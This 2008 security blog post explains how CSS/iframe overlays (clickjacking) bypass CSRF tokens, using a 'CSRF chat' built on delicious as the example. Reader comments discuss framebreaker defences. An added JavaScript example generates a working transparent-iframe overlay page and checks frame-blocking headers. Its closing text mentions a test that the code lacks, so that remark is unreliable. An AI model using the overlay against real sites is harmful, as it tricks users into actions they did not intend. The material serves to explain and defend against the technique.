You may think that adding tokens to your forms completely protects you from CSRF; you'd be wrong. I've shown in previous blog entries how CSS overlays can be used to bypass tokens: the attacker never reads the token, but instead tricks the user into clicking the genuine, token-bearing form. I decided to build a real-world example that uses these techniques to create something cool: the world's first CSRF chat! I got a couple of friends to try it out on various browsers, and we could communicate in pretty much real time.
Try it out here: CSRF chat
The technique uses delicious as a central hub to store the chat data: a bookmarked URL serves as the username and the bookmark's description as the message. First, a login is performed through a hidden iframe, using one delicious account shared between all chat users. A second iframe then loads the messages via the JSON feed that delicious provides for the account, and the chat data is displayed. Because delicious protects the save form with a token, a confirmation step is required: I simply overlay the request using yet another iframe, which displays the save button from the delicious web site itself, so that the user's own click submits the genuine form, token included.
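To make the overlay step concrete, here is an added example (not code from the original post or from the CSRF chat itself). The first part works out the CSS geometry that puts a target site's real submit button, transparent, underneath a decoy button on the attacker's page; the second part is the check a practitioner would run for the defence the comments call a "framebreaker", expressed as the response headers browsers honour today (X-Frame-Options and CSP frame-ancestors, which go beyond what the post itself discusses). Every URL, pixel coordinate and header value below is constructed for illustration; the real position of the delicious save button is not known from the post.

```javascript
// Added example (not code from the original post or the CSRF chat).
// Part 1: geometry of the CSS overlay. Part 2: is a page frameable at all?
// All URLs, coordinates and header values are constructed for illustration.

// ---- Part 1: the overlay --------------------------------------------------
// The attacker page shows a harmless decoy button. The real, token-bearing
// target form is loaded in an iframe that is shifted so the target's submit
// button lands exactly under the decoy, clipped to the button's size and made
// transparent. The victim's click hits the genuine button, so the target site
// submits its own token; the attacker never has to read it.

function overlayGeometry(targetButton, decoyButton) {
  // targetButton: {x, y, w, h} of the submit button inside the framed page.
  // decoyButton:  {x, y} where the decoy is drawn on the attacker page.
  return {
    clip:  { left: decoyButton.x, top: decoyButton.y,
             width: targetButton.w, height: targetButton.h },
    // Shifting the iframe by minus the button's page coordinates puts the
    // button's top-left corner at the clip window's origin.
    frame: { left: -targetButton.x, top: -targetButton.y },
  };
}

function overlayPage(targetUrl, targetButton, decoyButton, decoyLabel) {
  const g = overlayGeometry(targetButton, decoyButton);
  return [
    '<!doctype html><html><body>',
    // Decoy sits underneath; the clipped, transparent iframe is stacked on top.
    `<button style="position:absolute;left:${g.clip.left}px;top:${g.clip.top}px;` +
      `width:${g.clip.width}px;height:${g.clip.height}px">${decoyLabel}</button>`,
    `<div style="position:absolute;overflow:hidden;z-index:10;left:${g.clip.left}px;` +
      `top:${g.clip.top}px;width:${g.clip.width}px;height:${g.clip.height}px">`,
    // The iframe is oversized so the shifted button is still inside it.
    `<iframe src="${targetUrl}" scrolling="no" style="position:absolute;border:0;` +
      `opacity:0;left:${g.frame.left}px;top:${g.frame.top}px;width:2000px;height:2000px"></iframe>`,
    '</div></body></html>',
  ].join('\n');
}

// ---- Part 2: can a page be framed at all? ---------------------------------
// A script framebreaker (if (top !== self) top.location = self.location;) is
// what the comments suggest; it can be bypassed, so the durable fix is a
// response header. Given a page's headers, decide whether a given ancestor
// origin may frame it. Simplified: CSP sources are matched as whole origins,
// not by scheme/host patterns.

function frameable(headers, ancestorOrigin, pageOrigin) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v).trim();
  const ancestor = ancestorOrigin.toLowerCase();
  const page = pageOrigin.toLowerCase();

  const csp = h['content-security-policy'] || '';
  const fa = csp.split(';').map(d => d.trim().split(/\s+/))
    .find(d => d[0].toLowerCase() === 'frame-ancestors');
  if (fa) {
    // frame-ancestors is present: browsers ignore X-Frame-Options entirely.
    const sources = fa.slice(1).map(s => s.toLowerCase());
    if (sources.includes("'none'")) return false;
    if (sources.includes('*')) return true;
    if (sources.includes("'self'") && ancestor === page) return true;
    return sources.includes(ancestor);
  }

  const xfo = (h['x-frame-options'] || '').toUpperCase();
  if (xfo === 'DENY') return false;
  if (xfo === 'SAMEORIGIN') return ancestor === page;
  if (xfo.startsWith('ALLOW-FROM')) {
    return xfo.slice('ALLOW-FROM'.length).trim().toLowerCase() === ancestor;
  }
  // No frame policy at all, which is exactly what the overlay above relies on.
  return true;
}

// Constructed demo: a save form at target.example framed from attacker.example.
const demoHtml = overlayPage('http://target.example/save',
  { x: 640, y: 480, w: 80, h: 24 }, { x: 200, y: 300 }, 'Click to chat!');
console.log(demoHtml);
console.log(frameable({}, 'http://attacker.example', 'http://target.example'));                 // true
console.log(frameable({ 'X-Frame-Options': 'DENY' },
  'http://attacker.example', 'http://target.example'));                                         // false
```

Run it with node; the generated page is what a victim would be shown, and `frameable` returning true for an empty header set is the condition the whole trick depends on. Note that the header check deliberately follows the browser rule that a CSP `frame-ancestors` directive overrides any X-Frame-Options value, which is why the last assertion in the demo's spirit (a permissive ALLOW-FROM beside a `frame-ancestors 'none'`) still comes out as not frameable.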
Big thanks to David, Ronald, Mario and everyone else who helped test the chat room.

Comments (7)
Good stuff Gareth, good CSS overlay demonstration. Although it's a matter of time before someone changes the password, settings and other stuff for xsschat on delicious.
Posted 11 Feb 2008 at 2:06 pm

Thanks John, yeah you're right, but it's all in the name of fun.
Posted 11 Feb 2008 at 2:07 pm

Very creative.
For my own clarification, and perhaps that of others, this technique requires the ability to manipulate the page, correct?
An anti-CSRF token should be pretty strong unless there are lurking XSS problems, which I think we all agree is easier said than done. It's nice to be clear about where the risk lies.
Thanks!
Posted 11 Feb 2008 at 6:48 pm

@chris
The only requirement is central storage of data. This could be a WordPress blog, GMail account, delicious account, flickr account etc. You must also be able to read that data externally; in this case I used the delicious JSON functionality.
Delicious contains a form token to prevent posting of new URLs to an account, however I simply bypass this by asking the user to confirm the post.
Posted 11 Feb 2008 at 7:01 pm

btw I'm not saying tokens themselves are useless, but in this instance they are. To defend against this type of attack a simple framebreaker would help.
Posted 11 Feb 2008 at 7:13 pm

The account has been deleted now; I can't be bothered setting up another one. I may change the POC to allow multiple chatrooms, or if anyone wants to take the code and improve it then please do.
Posted 12 Feb 2008 at 10:10 am

thank you.. john
Posted 09 May 2008 at 11:39 am